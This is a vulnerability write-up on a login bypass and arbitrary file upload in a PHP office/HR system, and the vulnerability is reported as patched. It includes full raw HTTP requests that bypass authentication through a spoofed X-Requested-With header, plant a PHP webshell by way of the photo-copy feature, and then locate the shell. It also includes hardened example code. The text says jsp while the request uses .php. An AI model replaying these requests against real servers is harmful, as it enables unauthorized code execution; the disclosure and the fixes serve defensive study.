Vulnerability details
Root cause
The login check in inc/auth.php, when no user is logged in, reads the value of the X-Requested-With header. If it equals "LOGIN_USER_ID" the script terminates immediately; if it does not, the script issues a header() redirect to the login page. A header() redirect, however, does not stop the script, so the logic that follows keeps executing. Because X-Requested-With is client-controlled, sending any value other than "LOGIN_USER_ID" lets the rest of the page run, which is the login bypass.
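An added illustration of the pattern described above (not the vendor's inc/auth.php; the function names, session key and login URL are assumptions): the broken check that keys its decision on a client header and does not stop after the redirect, next to a fixed form that terminates on every unauthenticated path.

```php
<?php
// Added example, not vendor code. Assumed names: LOGIN_USER_ID session key,
// /login.php as the login page, require_login_* as the guard functions.

// Broken form of the guard. header() only queues a response header; PHP keeps
// executing the script, so the caller's business logic still runs for an
// unauthenticated request whenever X-Requested-With is anything but the
// magic value.
function require_login_broken(): void
{
    if (empty($_SESSION['LOGIN_USER_ID'])) {
        $xrw = $_SERVER['HTTP_X_REQUESTED_WITH'] ?? '';
        if ($xrw === 'LOGIN_USER_ID') {
            exit;                       // only this branch actually stops
        }
        header('Location: /login.php'); // redirect queued ...
        // ... but no exit: execution falls through to the protected page
    }
}

// Fixed form. The only thing that lets execution continue is a valid
// server-side session; no request header is consulted, and the redirect is
// always followed by exit so nothing after the guard can run.
function require_login_fixed(): void
{
    if (empty($_SESSION['LOGIN_USER_ID'])) {
        header('Location: /login.php', true, 302);
        exit;                           // stop regardless of any client input
    }
}

// Typical use at the top of a protected page.
session_start();
require_login_fixed();
// business logic below is reachable only with an authenticated session
```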
Exploitation
I found one feature where, when a picture is copied, the file extension of the copy is controllable. The resulting file name is not returned, but it has already been written to the database, so it only takes a query by id to get the file name.
Request
1. The suffix of ATTACHMENT_path is the suffix the copied file will have
2. HR_ID is the parameter used to look up the shell's path
3. ATTACHMENT_PIC is the shell content
ATTACHMENT_path is controllable; if it names a jsp file, the picture is copied straight to a jsp.
If an id parameter is present an update is executed, otherwise an insert. To be able to query the file name by a known id, pass an existing value as the id (HR_ID).
POST /general/hrms/manage/submit.php HTTP/1.1
Host: *********
Content-Length: 4448
Accept: */*
X-Requested-With: 123
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.43
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynSLonX7ReNBG43C7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=4305accfef8d87e8907003d2e2b40a55; LOGIN_LANG=cn
Connection: close

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="HR_ID"

1
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="ID"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="USER_ID"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="photo"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="ATTACHMENT_PIC_NAME"

C:\fakepath\4.jpg
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="ATTACHMENT_ID_OLD"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="ATTACHMENT_NAME_OLD"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="OPERATOR"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="DEPT_ID"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="check_hr_no"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="NO"

1
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="hr_name"

123
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="STATUS"

1
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="sex"

2
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="dept_id"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="BIRTHDAY"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="MARRY"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="EDUCATION"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="ATTACHMENT_path"

C:\fakepath\4.php
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="ATTACHMENT_PIC"; filename="4.jpg"
Content-Type: image/jpeg

<?php echo 1;?>
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="WORK_DATE"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="JOIN_DATE"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="LABOR_START_TIME"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="LABOR_END_TIME"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="POST"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="POLITICS"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="NATION"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="CARD_NO"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="NATIVE_PLACE"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="SPECIALITY"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="SCHOOL"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="CERTIFICATE"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="HOME_ADDR"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="HOME_TEL"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="EMAIL"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="REWARD"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="TRAIN"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="EDU"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="WORK"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="SOCIATY"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="RESUME"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="OTHERS"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="file_elem"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="attachmentIDStr"

------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name=" attachmentNameStr"

------WebKitFormBoundarynSLonX7ReNBG43C7--
If the response is a 302 and the body contains an internal error, the write succeeded.
Look up the shell path by id
POST /general/hrms/manage/hrms.php?HR_ID=1 HTTP/1.1
Host: *************
Content-Length: 0
Accept: */*
X-Requested-With: 123
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.43
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynSLonX7ReNBG43C7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=4305accfef8d87e8907003d2e2b40a55; LOGIN_LANG=cn
Connection: close
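The copy step described above, as an added hardened example (not the product's submit.php; the field names, $uploadDir and store_photo are assumptions): the stored extension is derived from the validated image bytes, never from the client-supplied ATTACHMENT_path or original filename, and the generated name is what gets persisted.

```php
<?php
// Added example, not vendor code. Assumptions: the upload arrives as
// $_FILES['ATTACHMENT_PIC'] and $uploadDir is a directory the web server
// does not execute scripts from.

// Allowlist keyed by detected MIME type; the value is the only extension
// a stored file may ever receive.
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

// Store an uploaded photo and return the generated file name to persist.
function store_photo(array $file, string $uploadDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('no valid upload');
    }

    // Decide the extension from the bytes. ATTACHMENT_path and the
    // client's filename are attacker-controlled and are never consulted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_IMAGE_TYPES[$mime])
        || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('rejected: not an allowed image');
    }

    // Random name, fixed extension: no user input reaches the path.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('store failed');
    }
    chmod($dest, 0644);                // data file, not executable
    return $name;                      // this, not the client's name, goes to the DB
}

// Usage in the submit handler (after the authentication guard has run):
// $stored = store_photo($_FILES['ATTACHMENT_PIC'] ?? [], '/var/oa/attach');
```

Whether the record is inserted or updated, the handler should also verify that the current session is allowed to modify the supplied HR_ID before touching the row.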
Summary
This vulnerability was patched rather quickly.